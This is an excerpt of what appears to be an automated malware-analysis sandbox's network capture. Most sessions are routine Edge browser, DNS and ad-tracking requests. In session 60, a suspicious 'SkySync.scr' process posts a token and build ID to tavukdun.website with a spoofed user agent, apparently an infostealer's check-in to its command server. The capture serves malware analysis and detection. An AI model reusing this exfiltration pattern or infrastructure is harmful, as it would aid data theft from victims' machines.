2024-11-01 19:58:19 UTC	182	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 19:58:19 GMT Connection: close Content-Length: 60 Server: h2o/dnsdist content-type: application/dns-message cache-control: max-age=32
2024-11-01 19:58:19 UTC	60	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 20 00 04 8e fa 1f 5e 00 00 29 04 d0 00 00 00 00 00 00 Data Ascii: wwwgstaticcom ^)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.11.20	61088	9.9.9.9	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:19 UTC	233	OUT	POST /dns-query HTTP/1.1 Host: dns.quad9.net Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-01 19:58:19 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-01 19:58:19 UTC	182	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 19:58:19 GMT Connection: close Content-Length: 60 Server: h2o/dnsdist content-type: application/dns-message cache-control: max-age=32
2024-11-01 19:58:19 UTC	60	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 20 00 04 8e fa 1f 5e 00 00 29 04 d0 00 00 00 00 00 00 Data Ascii: wwwgstaticcom ^)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.11.20	58137	9.9.9.9	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:19 UTC	233	OUT	POST /dns-query HTTP/1.1 Host: dns.quad9.net Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-01 19:58:19 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-01 19:58:19 UTC	182	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 19:58:19 GMT Connection: close Content-Length: 60 Server: h2o/dnsdist content-type: application/dns-message cache-control: max-age=32
2024-11-01 19:58:19 UTC	60	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 20 00 04 8e fa 1f 5e 00 00 29 04 d0 00 00 00 00 00 00 Data Ascii: wwwgstaticcom ^)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.11.20	60483	52.223.22.214	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:19 UTC	615	OUT	GET /getuid?ld=1&gdpr=0&cmp_cs=&us_privacy= HTTP/1.1 Host: eb2.3lift.com Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-01 19:58:19 UTC	172	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 19:58:19 GMT Content-Type: image/gif Content-Length: 37 Connection: close Cache-Control: no-cache, no-store, must-revalidate
2024-11-01 19:58:19 UTC	37	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 00 00 00 21 f9 04 01 0a 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b Data Ascii: GIF89a!,L;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.11.20	53018	35.213.89.133	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:19 UTC	641	OUT	GET /cs/msn?id=1537FB4C2D6A69131BC6EE662C9A68C5&gdpr=0&gdpr_consent= HTTP/1.1 Host: trace.popin.cc Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-01 19:58:19 UTC	289	IN	HTTP/1.1 200 OK Set-Cookie: __mguid_=09ac98cf827dac221mtr5r00m2z5py57; Path=/; Domain=popin.cc; Max-Age=31536000; Secure; SameSite=None Date: Fri, 01 Nov 2024 19:58:19 GMT Content-Length: 0 Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.11.20	51862	68.67.179.155	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:19 UTC	654	OUT	GET /getuid?https://c.bing.com/c.gif?anx_uid=$UID&Red3=MSAN_pd&gdpr=0&gdpr_consent= HTTP/1.1 Host: ib.adnxs.com Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-01 19:58:19 UTC	1511	IN	HTTP/1.1 307 Redirection Server: nginx/1.23.4 Date: Fri, 01 Nov 2024 19:58:19 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" X-XSS-Protection: 0 Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: * Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness Location: https://ib.adnxs.com/bounce?%2Fgetuid%3Fhttps%3A%2F%2Fc.bing.com%2Fc.gif%3Fanx_uid%3D%24UID%26Red3%3DMSAN_pd%26gdpr%3D0%26gdpr_consent%3D AN-X-Request-Uuid: fbbd9396-82be-4dfe-81f0-6d05b7930371 Set-Cookie: XANDR_PANID=BhBVxGLi2YPSXy0lS0P-nhXvuNxHvTbLZ9GRgpCMY6VgklOb9Md0SBE07pIN1H0u7xpY0a5zxKnY4rgbf7g3L7t8cteomZ4rJamSQaGltoo.; SameSite=None; Path=/; Max-Age=7776000; Expires=Thu, 30-Jan-2025 19:58:19 GMT; Domain=.adnxs.com; Secure; Partitioned Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Fri, 20-Oct-2034 19:58:19 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned Set-Cookie: uuid2=773153807852646522; SameSite=None; Path=/; Max-Age=7776000; Expires=Thu, 30-Jan-2025 19:58:19 GMT; Domain=.adnxs.com; Secure; HttpOnly X-Proxy-Origin: 191.96.150.229; 191.96.150.229; 579.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.11.20	61694	68.67.179.153	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:19 UTC	934	OUT	GET /bounce?%2Fmapuid%3Fmember%3D280%26user%3D172DCF8F4EDA69E736C3DAA54F2A68BD%3B%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D172DCF8F4EDA69E736C3DAA54F2A68BD%252526gdpr%25253D0%252526gdpr_consent%25253D HTTP/1.1 Host: m.adnxs.com Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-01 19:58:19 UTC	1531	IN	HTTP/1.1 302 Found Server: nginx/1.23.4 Date: Fri, 01 Nov 2024 19:58:19 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" X-XSS-Protection: 0 Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: * Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness Location: https://m.adnxs.com/seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D172DCF8F4EDA69E736C3DAA54F2A68BD%26gdpr%3D0%26gdpr_consent%3D AN-X-Request-Uuid: 69e0dbb4-d7ab-4d29-8024-a02b93e14b26 Set-Cookie: XANDR_PANID=3HAYiD6qhL5jq2lmDkcu6p_7ZzIVLQgMrbJqL57rSVMiWXIZs2WR179v0_vzur1wvvClQx9-lfYgfEmreMX8hoKx7J9i4UBhEkHS55BK-QI.; SameSite=None; Path=/; Max-Age=7776000; Expires=Thu, 30-Jan-2025 19:58:19 GMT; Domain=.adnxs.com; Secure; Partitioned Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Fri, 20-Oct-2034 19:58:19 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned Set-Cookie: uuid2=456454486744039273; SameSite=None; Path=/; Max-Age=7776000; Expires=Thu, 30-Jan-2025 19:58:19 GMT; Domain=.adnxs.com; Secure; HttpOnly X-Proxy-Origin: 191.96.150.229; 191.96.150.229; 570.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.11.20	56540	172.241.51.69	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:19 UTC	647	OUT	GET /sync?ssp=msn&id=1537FB4C2D6A69131BC6EE662C9A68C5&gdpr=0&gdpr_consent= HTTP/1.1 Host: code.yengo.com Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-01 19:58:20 UTC	255	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:20 GMT Content-Type: application/octet-stream Content-Length: 0 Connection: close Strict-Transport-Security: max-age=15768000; includeSubdomains; preload X-Content-Type-Options: nosniff

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.11.20	54940	68.67.161.208	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:19 UTC	692	OUT	GET /bounce?%2Fgetuid%3Fhttps%3A%2F%2Fc.bing.com%2Fc.gif%3Fanx_uid%3D%24UID%26Red3%3DMSAN_pd%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1 Host: ib.adnxs.com Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-01 19:58:19 UTC	1029	IN	HTTP/1.1 302 Found Server: nginx/1.23.4 Date: Fri, 01 Nov 2024 19:58:19 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" X-XSS-Protection: 0 Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: * Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness Location: https://c.bing.com/c.gif?anx_uid=0&Red3=MSAN_pd&gdpr=0&gdpr_consent= AN-X-Request-Uuid: f2a10906-ff8b-4387-a08c-3cc8e32af28b Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Fri, 20-Oct-2034 19:58:19 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned X-Proxy-Origin: 191.96.150.229; 191.96.150.229; 806.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.11.20	62018	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:19 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJDBAAEGDBKKECBGIJEB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 10821 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:19 UTC	10821	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 0d 0a 43 6f 6e 74 Data Ascii: ------JJDBAAEGDBKKECBGIJEBContent-Disposition: form-data; name="token"7c44ecf0b47a0af18c9b895040197b94------JJDBAAEGDBKKECBGIJEBContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------JJDBAAEGDBKKECBGIJEBCont
2024-11-01 19:58:20 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:58:20 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.11.20	60191	68.67.179.155	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:20 UTC	718	OUT	GET /seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D172DCF8F4EDA69E736C3DAA54F2A68BD%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1 Host: m.adnxs.com Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-01 19:58:20 UTC	1580	IN	HTTP/1.1 307 Redirection Server: nginx/1.23.4 Date: Fri, 01 Nov 2024 19:58:20 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" X-XSS-Protection: 0 Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: * Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness Location: https://m.adnxs.com/bounce?%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D172DCF8F4EDA69E736C3DAA54F2A68BD%2526gdpr%253D0%2526gdpr_consent%253D AN-X-Request-Uuid: 36469f60-6fd7-42fd-9356-4da45e364068 Set-Cookie: XANDR_PANID=eIQLlGFD4X0y_0KOELAvxrY427MdC-6T1nhk_4P8PE9MK0if1kAgTv13oyCiHurJjKR82GsGavfvlJA0AKH-HQ5nkkMYPDfowueX72mNB1A.; SameSite=None; Path=/; Max-Age=7776000; Expires=Thu, 30-Jan-2025 19:58:20 GMT; Domain=.adnxs.com; Secure; Partitioned Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Fri, 20-Oct-2034 19:58:20 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned Set-Cookie: uuid2=8313131610619404037; SameSite=None; Path=/; Max-Age=7776000; Expires=Thu, 30-Jan-2025 19:58:20 GMT; Domain=.adnxs.com; Secure; HttpOnly X-Proxy-Origin: 191.96.150.229; 191.96.150.229; 579.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.11.20	49838	20.189.173.1	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:20 UTC	1023	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1730491098691&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 15736 sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: USRLOC=; MUID=1537FB4C2D6A69131BC6EE662C9A68C5; _EDGE_S=F=1&SID=1488FC703BC865F32CBBE95A3A496463; _EDGE_V=1; msnup=
2024-11-01 19:58:20 UTC	15736	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 30 31 54 31 39 3a 35 38 3a 31 38 2e 36 39 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 62 33 66 64 34 37 34 2d 38 36 39 30 2d 34 30 30 38 2d 39 64 65 35 2d 64 62 37 37 32 66 35 64 39 66 33 30 22 2c 22 65 70 6f 63 68 22 3a 22 33 34 33 39 34 30 39 32 34 34 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-01T19:58:18.690Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"fb3fd474-8690-4008-9de5-db772f5d9f30","epoch":"3439409244"},"app":{"locale
2024-11-01 19:58:20 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=537ea771d8c740b79d60f572f8a77486&HASH=537e&LV=202411&V=4&LU=1730491100201; Domain=.microsoft.com; Expires=Sat, 01 Nov 2025 19:58:20 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=5f284cdc9b954aa2ad4a143d6de66adf; Domain=.microsoft.com; Expires=Fri, 01 Nov 2024 20:28:20 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1510 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Fri, 01 Nov 2024 19:58:19 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.11.20	49793	68.67.179.155	443

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:20 UTC	760	OUT	GET /bounce?%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D172DCF8F4EDA69E736C3DAA54F2A68BD%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1 Host: m.adnxs.com Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.11.20	51447	20.189.173.1	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:20 UTC	1022	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1730491098840&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 9070 sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: USRLOC=; MUID=1537FB4C2D6A69131BC6EE662C9A68C5; _EDGE_S=F=1&SID=1488FC703BC865F32CBBE95A3A496463; _EDGE_V=1; msnup=
